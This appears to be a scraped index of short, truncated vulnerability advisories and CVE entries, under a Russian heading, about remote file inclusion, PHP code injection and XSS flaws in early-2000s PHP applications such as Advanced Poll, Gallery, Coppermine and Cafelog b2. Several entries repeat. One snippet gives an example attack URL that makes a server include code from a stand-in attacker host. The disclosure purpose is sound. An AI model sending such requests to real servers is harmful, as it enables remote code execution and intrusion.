Новые уязвимости.

Командой сетевой безопасности LwB Team найдены следующие уязвимости: 1.Произвольный PHP код в Flipper Poll v1.1 URL: http://php.pogoworld.co.uk FILE: poll.php Не проверяется фактическое расположение сценария: config.php , представленного в параметре rootpath . Exploit:...

php.advanced.poll.txt

Informations : °°°°°°°°°°°°° Language : PHP Product : Advanced Poll Version : 2.0.2 Textfile Website : http://www.proxy2.de Problems : - PHP Code Injection - File Include - Phpinfo PHP Code/Location : °°°°°°°°°°°°°°°°°°° comments.php :...

Advanced Poll : PHP Code Injection, File Include, Phpinfo

Informations : °°°°°°°°°°°°° Language : PHP Product : Advanced Poll Version : 2.0.2 Textfile Website : http://www.proxy2.de Problems : - PHP Code Injection - File Include - Phpinfo PHP Code/Location : °°°°°°°°°°°°°°°°°°° comments.php :...

Gallery 1.4 - index.php Remote File Inclusion

Gallery 1.4 - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/8814/info It has been reported that Gallery is prone to a remote file include vulnerability in the index.php script file. The problem occurs due to the program failing to verify the location in which it includ...

EMML.txt

Informations : °°°°°°°°°°°°° Language : PHP ------------------------------------------------- Produit : EMML EternalMart Mailing List Manager Version : 1.32 ------------------------------------------------- Produit : EMGB EternalMart Guestbook Version : 1.1...

EternalMart Mailing List Manager 1.32 - Remote File Inclusion

source: https://www.securityfocus.com/bid/8767/info EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver. http://target/admin/auth.php?emmladminpath=http://attacker will include the...

CVE-2003-0559

mainfile.php in phpforum 2 RC-1, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code by modifying the MAINPATH parameter to reference a URL on a remote web server that contains the code...

BBCode XSS in XOOPS CMS

Informations : °°°°°°°°°°°°° Language : PHP Bugged Versions : 1.3.x and less + 2.0.x and less ? not checked Safe Version : 2.0.3 Website : http://www.xoops.org Problem : BBcode XSS PHP Code/Location : °°°°°°°°°°°°°°°°°°° This hole can be used in modules : - Private Messages - News - NewBB forum...

PUPET-simpnews.txt

original File name : PUPET-simpnews.txt date releases : july 15, 2003 Informations : ========================= Advisory Name: Simpnews include file Vulnerability Author: PUPET Discover by: PUPET Website vendor : http://www.boesch-it.de/ Versions : tested on V2.01 - V2.13 Problem : Include file PH...

CVE-2003-0559

mainfile.php in phpforum 2 RC-1, and possibly earlier versions, allows remote attackers to execute arbitrary PHP code by modifying the MAINPATH parameter to reference a URL on a remote web server that contains the code...

CVE-2003-1086

PHP remote file inclusion vulnerability in pm/lib.inc.php in pMachine Free and pMachine Pro 2.2 and 2.2.1 allows remote attackers to execute arbitrary PHP code by modifying the pmpath parameter to reference a URL on a remote web server that contains the code...

Zentrack 2.2/2.3/2.4 - 'index.php' Remote File Inclusion

source: https://www.securityfocus.com/bid/7843/info A remote file include vulnerability has been reported for Zentrack. Due to insufficient sanitization of some user-supplied variables by the 'index.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL. If the...

Cafelog b2 0.6 - Remote File Inclusion

Cafelog b2 0.6 - Remote File Inclusion source: https://www.securityfocus.com/bid/7738/info A remote file include vulnerability has been reported for Cafelog. Due to insufficient sanitization of some user-supplied variables by the 'blogger-2-b2.php' and 'gm-2-b2.php' scripts, it is possible for a...

CVE-2003-0320

header.php in ttCMS 2.3 and earlier allows remote attackers to inject arbitrary PHP code by setting the ttcmsuseradmin parameter to "1" and modifying the adminroot parameter to point to a URL that contains a Trojan horse header.inc.php script...

CVE-2003-0275

SSI.php in YaBB SE 1.5.2 allows remote attackers to execute arbitrary PHP code by modifying the sourcedir parameter to reference a URL on a remote web server that contains the code...

miniPortail (PHP) : Admin Access

Informations : °°°°°°°°°°°°°° Language : PHP Website : http://www.aldweb.com/ Version : 1.9, 2.0, 2.1, 2.2 and less ? Problem : Admin Access PHP Code/Location : °°°°°°°°°°°°°°°°°°° admin/admin.php :...

truegalerie.txt

Informations : °°°°°°°°°°°°°° Language : PHP Website : http://www.truelogik.net Version : 1.0 Problems : - Admin Access - File Copy PHP Code/Location : °°°°°°°°°°°°°°°°°°° verifadmin.php, checkadmin.php : ------------------------------------------------------------------------ "; echo ""; echo...

CVE-2002-1466

CafeLog b2 Weblog Tool 2.06pre4, with allowfopenurl enabled, allows remote attackers to execute arbitrary PHP code via the b2inc variable...

Coppermine Photo Gallery 1.0 - PHP Code Injection

source: https://www.securityfocus.com/bid/7300/info Coppermine Photo Gallery has been reported prone to PHP code injection attacks. Due to a lack of sufficient sanitization performed on user-supplied filenames that are uploaded into the Photo Gallery, an attacker may upload a malicious JPEG. The...

Coppermine Photo Gallery 1.0 - PHP Code Injection

Coppermine Photo Gallery 1.0 - PHP Code Injection source: https://www.securityfocus.com/bid/7300/info Coppermine Photo Gallery has been reported prone to PHP code injection attacks. Due to a lack of sufficient sanitization performed on user-supplied filenames that are uploaded into the Photo...